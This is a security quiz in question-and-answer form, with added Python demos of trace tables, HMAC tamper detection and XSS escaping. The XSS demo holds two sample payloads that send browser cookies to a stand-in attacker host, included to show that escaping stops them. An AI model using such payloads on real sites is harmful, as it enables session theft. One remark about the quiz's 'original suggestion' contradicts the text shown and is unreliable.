Physical and Software Security Controls
Software Auditing and Testing Strategies
Software security & vulnerabilities
Web application risk
100

Verifies a user's identity, typically by checking a username and password, before allowing access to a system

What is User Authentication?

100

Used to check, review and test code, whether written locally or obtained from an online source, for defects and vulnerabilities before it is trusted

What is software auditing?

100

When personal information is accessed, disclosed without authorisation, or is lost.

What is a data breach?

100

Running malicious SQL commands by placing them in unsanitised user input that is concatenated into a query, allowing unauthorised users to read, add, modify or delete the contents of the SQL database.

What is SQL injection?

200

Used to preserve old versions of software so that changes can be rolled back if required

What is version control?

200

This leaves the software exposed to many risks, including bugs that an attacker can exploit

What is malicious or poorly written code?

200

Leaked email addresses might be used for phishing scams and for unauthorised access to customer accounts.

What are some consequences of data breaches?

200

Use parameterised queries (prepared statements) so user input is passed to the database as data rather than as part of the SQL text; where that is not possible, sanitise/escape the special characters and delimiters that SQL would treat as commands.

What can you do to prevent SQL injections?

300

Used to convert readable plaintext into ciphertext that can only be read by someone who holds the key

What is Encryption?

300

Used to simulate a cyber attack against the computer system to find vulnerabilities before a real attacker does

What is penetration testing?

300

An attacker intercepts an electronic communication and impersonates the client to the supplier and the supplier to the client, so that they can read or alter the data passing between them.

What is a man-in-the-middle attack?

300

Malicious script placed in unsanitised user input is reflected straight back by the server, or stored and served later, and is then executed in other users' browsers with their session and privileges

What is cross-site scripting (XSS)?

400

Used to fix bugs, patch known vulnerabilities and improve performance

What is a software update?

400

Keep the anti-virus software up to date so the download is scanned, and audit the module's code before using it.

What is a method of reducing the risk of downloading a module?

400

Manipulating people, the weakest link in a computer system, into revealing information or granting access

What is social engineering?

400

Allows dynamic and interactive content on HTML/CSS webpages by running code in the user's browser.

What is JavaScript?

500

Used to filter network traffic and block malware before it reaches the software on the system

What are firewalls and system protection?

500

A method of testing the behaviour of an algorithm written in pseudocode by recording the value of every variable after each step.

What are trace tables?
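A trace table is easiest to understand from one built by hand. The block below is an added example, not part of the quiz: it traces a password comparison written in the early-exit style common in pseudocode (stop at the first character that differs) and returns one row per loop iteration. The algorithm and the sample values are constructed for the demo. Besides showing how the table is built, the trace makes visible something the pseudocode hides: the number of steps depends on how many leading characters of the guess are correct, which is why real code uses a constant-time comparison such as Python's `hmac.compare_digest`.

```python
# Pseudocode being traced (constructed for this example):
#
#   FUNCTION compare(stored, guess)
#       IF LEN(stored) <> LEN(guess) THEN RETURN FALSE
#       FOR i <- 0 TO LEN(stored) - 1
#           IF stored[i] <> guess[i] THEN RETURN FALSE
#       NEXT i
#       RETURN TRUE
#   END FUNCTION

COLUMNS = ["i", "stored[i]", "guess[i]", "equal"]


def trace_compare(stored: str, guess: str):
    """Execute the early-exit comparison and return (rows, result).

    rows is the trace table: one dict per loop iteration, holding the value of
    every variable the pseudocode touches in that step.
    """
    rows = []
    if len(stored) != len(guess):
        return rows, False          # loop never entered: the table stays empty
    for i in range(len(stored)):
        equal = stored[i] == guess[i]
        rows.append({"i": i, "stored[i]": stored[i], "guess[i]": guess[i], "equal": equal})
        if not equal:
            return rows, False      # early exit: no further rows are produced
    return rows, True


def steps_taken(stored: str, guess: str) -> int:
    # Number of loop iterations, i.e. the number of rows in the trace table.
    rows, _ = trace_compare(stored, guess)
    return len(rows)


def format_trace(rows) -> str:
    # Render the rows as a fixed-width table, header first.
    lines = [" | ".join(col.ljust(9) for col in COLUMNS)]
    for row in rows:
        lines.append(" | ".join(str(row[col]).ljust(9) for col in COLUMNS))
    return "\n".join(lines)


if __name__ == "__main__":
    stored = "hunter2"
    for guess in ("zzzzzzz", "hunzzzz", "hunter2"):
        rows, result = trace_compare(stored, guess)
        print(f"guess={guess!r} result={result} steps={len(rows)}")
        print(format_trace(rows))
        print()
```

Reading the three tables side by side, a wholly wrong guess produces one row, a guess with the first three characters right produces four, and the correct password produces seven: the table length itself is information about the secret.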

500

Use encrypted and authenticated connections (for example HTTPS/TLS with certificate checking) so that an attacker who intercepts the traffic can neither read nor alter it.

What is a strategy to prevent a man-in-the-middle attack?
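The man-in-the-middle answers above rest on one idea: the receiver must be able to tell that a message was not altered in transit. The block below is an added example, not from the quiz, showing the integrity half of that defence with a shared-key HMAC over a constructed payment message, first unprotected and then protected. The shared key, the message format and the attacker's rewrite are all assumptions made for the demo; in practice the key comes from a key exchange such as the TLS handshake, and TLS adds encryption (confidentiality) and certificate-based server authentication on top of the tamper detection shown here.

```python
import hashlib
import hmac

# Constructed shared key known to client and server but not to the attacker.
# In a real system this is negotiated, never hard-coded.
SHARED_KEY = b"demo-key-do-not-reuse"


def protect(key: bytes, message: bytes) -> bytes:
    # Sender: append an HMAC-SHA256 tag computed over the message.
    tag = hmac.new(key, message, hashlib.sha256).hexdigest().encode()
    return message + b"|" + tag


def verify(key: bytes, wire: bytes):
    # Receiver: recompute the tag over what arrived and compare in constant time.
    # Returns the message if the tag matches, None if the message was altered.
    message, _, tag = wire.rpartition(b"|")
    expected = hmac.new(key, message, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):
        return None
    return message


def attacker_tamper(wire: bytes) -> bytes:
    # Man-in-the-middle: rewrite the payment amount while the message is in transit.
    return wire.replace(b"amount=10", b"amount=1000")


def run_unprotected(tamper: bool) -> bytes:
    # No integrity protection: the server accepts whatever reaches it.
    wire = b"to=bob;amount=10"
    if tamper:
        wire = attacker_tamper(wire)
    return wire


def run_protected(tamper: bool):
    # Same exchange with an HMAC tag: tampering breaks the tag and is rejected.
    wire = protect(SHARED_KEY, b"to=bob;amount=10")
    if tamper:
        wire = attacker_tamper(wire)
    return verify(SHARED_KEY, wire)


if __name__ == "__main__":
    print(run_unprotected(tamper=True))   # server sees amount=1000
    print(run_protected(tamper=False))    # genuine message accepted
    print(run_protected(tamper=True))     # None: altered message rejected
```

The attacker can still read the message here, since nothing is encrypted, and can still replay an old genuine message; the example only demonstrates that a keyed tag stops silent modification, which is the property the quiz's original suggestion (longer passwords) does nothing to provide.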

500

Escape/encode user input for the context in which it is displayed (for example convert < > & " ' into HTML entities) so the browser shows it as text rather than running it as script.

What can you do to prevent XSS?
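The XSS answers above translate into a few lines of server-side rendering code. The following is an added example written for this page, not code from the quiz: a hypothetical comment renderer in three versions, one that inserts the text raw, one that only strips `<script>` tags (a blocklist, which a payload using an event-handler attribute walks straight past), and one that encodes the HTML metacharacters. The payloads and the `attacker.example` host are constructed for the demo. Because a real browser is not available offline, a small detector stands in for it by reporting whether the rendered fragment still contains markup that would execute.

```python
import html
import re


def render_comment_unsafe(comment: str) -> str:
    # The user's text becomes part of the HTML: any tags in it are parsed as tags.
    return '<p class="comment">%s</p>' % comment


SCRIPT_TAG = re.compile(r"<script.*?>.*?</script>", re.IGNORECASE | re.DOTALL)


def render_comment_blocklist(comment: str) -> str:
    # A common but inadequate fix: remove <script> blocks and hope nothing else runs code.
    return '<p class="comment">%s</p>' % SCRIPT_TAG.sub("", comment)


def render_comment_escaped(comment: str) -> str:
    # Output encoding: & < > " ' become entities, so the browser displays the text
    # literally and never interprets it as a tag or an attribute.
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


ACTIVE_MARKUP = re.compile(r"<\w+[^>]*\son\w+\s*=|<script", re.IGNORECASE)


def contains_active_markup(rendered: str) -> bool:
    # Demo stand-in for the browser: true if the fragment still contains a script tag
    # or a tag carrying an on* event-handler attribute.
    return ACTIVE_MARKUP.search(rendered) is not None


# Constructed payloads: a script tag that exfiltrates the cookie, and an <img>
# whose onerror handler does the same without any <script> tag at all.
PAYLOAD_SCRIPT = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
PAYLOAD_ONERROR = '<img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">'

if __name__ == "__main__":
    for name, render in (
        ("unsafe", render_comment_unsafe),
        ("blocklist", render_comment_blocklist),
        ("escaped", render_comment_escaped),
    ):
        for payload in (PAYLOAD_SCRIPT, PAYLOAD_ONERROR):
            print(name, contains_active_markup(render(payload)), render(payload))
```

Escaping is the defence for text placed in an HTML body; input that ends up inside an attribute, a URL or a JavaScript block needs the encoding appropriate to that context, and a Content Security Policy limits the damage if an encoding step is missed.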
